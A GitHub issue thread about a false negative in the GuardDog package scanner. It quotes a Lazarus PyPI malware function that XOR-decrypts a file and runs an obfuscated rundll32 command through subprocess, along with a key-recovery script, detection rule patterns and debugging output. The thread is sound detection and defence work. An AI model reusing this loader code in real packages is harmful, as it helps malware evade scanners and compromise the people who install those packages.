New pypi exploits #311

jxdv · 2024-02-29T15:14:52Z

Sources:
https://thehackernews.com/2024/02/lazarus-exploits-typos-to-sneak-pypi.html
https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html

I ran guarddog on a locally zipped copy of this code and got 0 malicious indicators:

def crypt(filepath, key, strKey, no):
    inputFilePath = os.path.join(filepath, 'test.py')
    outputFilePath = os.path.join(filepath, 'output.py')
    command = b'\xae\xa9\xb2\xb8\xb0\xb0\xef\xee'
    if os.path.isfile(inputFilePath):
        with open(inputFilePath, "rb") as f1:
            with open(outputFilePath, "wb") as f3:
                while True:
                    byte = f1.read(1)
                    if not byte:
                        break  # End of file

                    # Perform XOR encryption
                    encrypted_byte = ord(byte) ^ key

                    # Write the encrypted byte to output file
                    f3.write(bytes([encrypted_byte]))
        result_bytes = bytes([byte ^ strKey for byte in command])
        result_string = result_bytes.decode('utf-8')
        strcommand = result_string + " " + outputFilePath + ", CalculateSum" + str(no)
        try:
            subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            os.remove(inputFilePath)
        except:
            pass
    if os.path.isfile(outputFilePath):
        os.remove(outputFilePath)
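
Note on the sample: the `command` bytes are XORed with `strKey` before being passed to `subprocess.run`, so the name of the executed program never appears as a literal in the source. Below is a minimal sketch of recovering it, assuming a single-byte key. The key value is not shown in the snippet, so the sketch tries all 256 values and keeps those that decode to ASCII letters and digits. The helper names `xor_decode` and `candidate_keys` are made up for illustration.

```python
# Obfuscated bytes copied from the sample above.
COMMAND = b'\xae\xa9\xb2\xb8\xb0\xb0\xef\xee'


def xor_decode(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def candidate_keys(data: bytes) -> dict[int, str]:
    """Return {key: decoded_text} for keys whose output is ASCII alphanumeric."""
    results = {}
    for key in range(256):
        decoded = xor_decode(data, key)
        # bytes.isalnum() is only true for ASCII letters and digits.
        if decoded.isalnum():
            results[key] = decoded.decode("ascii")
    return results


if __name__ == "__main__":
    for key, text in candidate_keys(COMMAND).items():
        print(f"key=0x{key:02x} -> {text}")
```

Among the candidates, key `0xdc` decodes the bytes to `rundll32`. The executed command is only assembled at runtime, which is why a rule has to match the `subprocess.run` call itself rather than any command string.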

cedricvanrompay-datadog · 2024-03-05T10:50:16Z

Weird, the subprocess.run should have been caught by

guarddog/guarddog/analyzer/sourcecode/code-execution.yml

Line 39 in e49bf32

- pattern: subprocess.run($ARG1, ...)
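
To make it concrete what this pattern is expected to match, here is a rough Python analogue built on the standard `ast` module. It is not how Semgrep works internally and it is not GuardDog code. It only flags calls written literally as `subprocess.run(...)` with at least one argument, and the function name `find_subprocess_run_calls` is hypothetical.

```python
import ast


def find_subprocess_run_calls(source: str) -> list[int]:
    """Return line numbers of calls written literally as subprocess.run(...)."""
    lines = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if (
            isinstance(func, ast.Attribute)
            and func.attr == "run"
            and isinstance(func.value, ast.Name)
            and func.value.id == "subprocess"
            # Simplification: require at least one argument of any kind.
            and (node.args or node.keywords)
        ):
            lines.append(node.lineno)
    return sorted(lines)


# Trimmed-down stand-in for the tail of the crypt() sample.
SAMPLE = '''\
import subprocess
cmd = "echo hi"
try:
    subprocess.run(cmd, shell=True, check=True)
except Exception:
    pass
'''

if __name__ == "__main__":
    print(find_subprocess_run_calls(SAMPLE))
```

The call sits inside a `try` block and takes a variable rather than a string literal, just like in the reported sample, and a syntactic match still finds it. So the shape of the call alone does not explain the false negative.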

cedricvanrompay-datadog · 2024-03-05T10:59:28Z

I can reproduce the false negative:

$  pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

cedricvanrompay-datadog · 2024-03-05T11:03:33Z

And I can confirm that my reproduction method (putting the Python file in a ZIP and scanning the ZIP) is supposed to work:

$ zip -r ~/tinkering/guarddog-samples/code-execution.zip tests/analyzer/sourcecode/code-execution.py
  adding: tests/analyzer/sourcecode/code-execution.py (deflated 60%)
$ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/code-execution.zip
Found 16 potentially malicious indicators in /Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.zip

code-execution: found 14 source code matches
[...]

cedricvanrompay-datadog · 2024-03-05T11:38:24Z

However, it seems that semgrep alone does find the code execution (at line 221 in my example):

➜  guarddog git:(main) ✗ git diff tests/analyzer/sourcecode/code-execution.py
diff --git a/tests/analyzer/sourcecode/code-execution.py b/tests/analyzer/sourcecode/code-execution.py
index 1db1bd4..5956b5c 100644
--- a/tests/analyzer/sourcecode/code-execution.py
+++ b/tests/analyzer/sourcecode/code-execution.py
@@ -196,3 +196,31 @@ def run_file(path):
     # ruleid: code-execution
        p = subprocess.Popen(f"python {path}",shell=True,stdin=None,stdout=subprocess.PIPE,stderr=subprocess.PIPE,close_fds=True)
        out, err = p.communicate()
+
+def crypt(filepath, key, strKey, no):
+    inputFilePath = os.path.join(filepath, 'test.py')
+    outputFilePath = os.path.join(filepath, 'output.py')
+    command = b'\xae\xa9\xb2\xb8\xb0\xb0\xef\xee'
+    if os.path.isfile(inputFilePath):
+        with open(inputFilePath, "rb") as f1:
+            with open(outputFilePath, "wb") as f3:
+                while True:
+                    byte = f1.read(1)
+                    if not byte:
+                        break  # End of file
+
+                    # Perform XOR encryption
+                    encrypted_byte = ord(byte) ^ key
+
+                    # Write the encrypted byte to output file
+                    f3.write(bytes([encrypted_byte]))
+        result_bytes = bytes([byte ^ strKey for byte in command])
+        result_string = result_bytes.decode('utf-8')
+        strcommand = result_string + " " + outputFilePath + ", CalculateSum" + str(no)
+        try:
+            subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+            os.remove(inputFilePath)
+        except:
+            pass
+    if os.path.isfile(outputFilePath):
+        os.remove(outputFilePath)
➜  guarddog git:(main) ✗ pipenv run semgrep --metrics off --test --config guarddog/analyzer/sourcecode/code-execution.yml tests/analyzer/sourcecode/code-execution.py
0/1: 1 unit tests did not pass:
--------------------------------------------------------------------------------
	✖ code-execution                                               missed lines: [], incorrect lines: [221]
	test file path: /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/tests/analyzer/sourcecode/code-execution.py


No tests for fixes found.

cedricvanrompay-datadog · 2024-03-05T11:49:22Z

Wait, that's weird: whether guarddog reports findings depends on the filename I use in the ZIP archive:

➜  guarddog git:(main) ✗ # both files are the same
➜  guarddog git:(main) ✗ diff ~/tinkering/guarddog-samples/code-execution.py ~/tinkering/guarddog-samples/sample.py
➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/sample.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/sample.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/code-execution.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 1 potentially malicious indicators in /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

code-execution: found 1 source code matches
  * This package is executing OS commands in the setup.py file at Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py/Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py:25
        subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

It seems to ignore the file if it is named sample.py in the ZIP archive.
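
The comparison above can be scripted so that the file name is the only thing that differs between archives. This is a sketch using only the standard `zipfile` module. The `pkg/` prefix and the helper names `make_archive` and `build_variants` are assumptions for illustration, and the script does not invoke guarddog itself.

```python
import tempfile
import zipfile
from pathlib import Path


def make_archive(zip_path: Path, member_name: str, content: bytes) -> Path:
    """Write a ZIP containing a single member with the given name and content."""
    with zipfile.ZipFile(zip_path, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, content)
    return zip_path


def build_variants(workdir: Path, content: bytes, names: list[str]) -> dict[str, Path]:
    """Build one archive per member name, all with byte-identical content."""
    return {
        name: make_archive(workdir / f"{Path(name).stem}.zip", f"pkg/{name}", content)
        for name in names
    }


if __name__ == "__main__":
    # Placeholder payload; substitute the bytes of the file under test.
    payload = b"import subprocess\nsubprocess.run('echo hi', shell=True)\n"
    workdir = Path(tempfile.mkdtemp())
    names = ["sample.py", "foo.py", "code-execution.py", "setup.py"]
    for name, path in build_variants(workdir, payload, names).items():
        print(f"{name}: {path}")
```

Each printed archive can then be passed to `python -m guarddog pypi scan <path>` as in the transcripts above, and the indicator counts compared.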

cedricvanrompay-datadog · 2024-03-05T11:59:53Z

Well, it seems GuardDog does have a list of files it will not scan with Semgrep:

guarddog/guarddog/analyzer/analyzer.py

Line 50 in e49bf32

self.exclude = [

However, sample.py should not match any of them, which is weird.

cedricvanrompay-datadog · 2024-03-05T12:03:53Z

Well, running guarddog with an empty self.exclude does not fix the problem.

cedricvanrompay-datadog · 2024-03-05T12:14:52Z

foo.py gets ignored just like sample.py

➜  guarddog git:(main) ✗ sha256sum ~/tinkering/guarddog-samples/foo.py ~/tinkering/guarddog-samples/sample.py ~/tinkering/guarddog-samples/code-execution.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py
➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/foo.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog --log-level=DEBUG pypi scan ~/tinkering/guarddog-samples/sample.zip
DEBUG: Considering that '/Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip' is a local target, scanning filesystem
DEBUG: Extracting archive /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip to directory /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
DEBUG: content of /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd: ['/var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py', '/var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py']
DEBUG: No rules specified using full rules directory /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/guarddog/analyzer/sourcecode
DEBUG: Running source code rules against /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
DEBUG: Invoking semgrep with command line: semgrep --config /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/guarddog/analyzer/sourcecode --no-git-ignore --json --quiet /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

So the problem seems to be that semgrep ignores every single file unless it's named code-execution.py?

According to https://semgrep.dev/docs/writing-rules/testing-rules/:

Semgrep looks for tests based on the rule filename and the languages specified in the rule. In other words, path/to/rule.yaml searches for path/to/rule.py, path/to/rule.js and similar, based on the languages specified in the rule.

But this is just supposed to be for testing, right?

cedricvanrompay-datadog · 2024-03-05T12:16:00Z

Ah, found it! It's not a bug it's a feature ™️

guarddog/guarddog/analyzer/sourcecode/code-execution.yml

Line 1 in e49bf32

# Only searches in setup.py to reduce false positives!

guarddog/guarddog/analyzer/sourcecode/code-execution.yml

Lines 113 to 116 in e49bf32

    paths:
      include:
        - "*/setup.py"
        - "*/code-execution.py"
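
The effect of this include list can be approximated in a few lines of Python. This is only a sketch: it uses `fnmatch.fnmatchcase` from the standard library as a stand-in for Semgrep's own path matching, whose exact glob semantics may differ, and the example paths and the name `is_scanned` are made up.

```python
from fnmatch import fnmatchcase

# Include patterns copied from code-execution.yml.
INCLUDE = ["*/setup.py", "*/code-execution.py"]


def is_scanned(path: str, include: list[str] = INCLUDE) -> bool:
    """Approximate whether the rule would consider a file at this path."""
    return any(fnmatchcase(path, pattern) for pattern in include)


if __name__ == "__main__":
    for path in [
        "pkg/setup.py",
        "pkg/code-execution.py",
        "pkg/sample.py",
        "pkg/foo.py",
        "pkg/module/__init__.py",
    ]:
        print(f"{path}: {'scanned' if is_scanned(path) else 'skipped'}")
```

Under this approximation only `setup.py` and `code-execution.py` are considered, which is consistent with `sample.py` and `foo.py` producing no findings despite having identical content.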

cedricvanrompay-datadog · 2024-03-05T12:18:14Z

So, the conclusion is:

- GuardDog is able to detect this code execution.
- Currently, it only scans setup.py for this rule.
- This would have missed the malicious packages in https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html, since the code execution was in __init__.py in this case.

christophetd · 2024-04-03T13:22:58Z

closing in favor of #312 as discussed with @cedricvanrompay-datadog

This was referenced Mar 5, 2024:

Identify new malicious pypi packages #306 (Closed)

GuardDog Only Scans "setup.py" For Code Execution #312 (Open)

christophetd added the false-negative label Mar 5, 2024

christophetd closed this as completed Apr 3, 2024
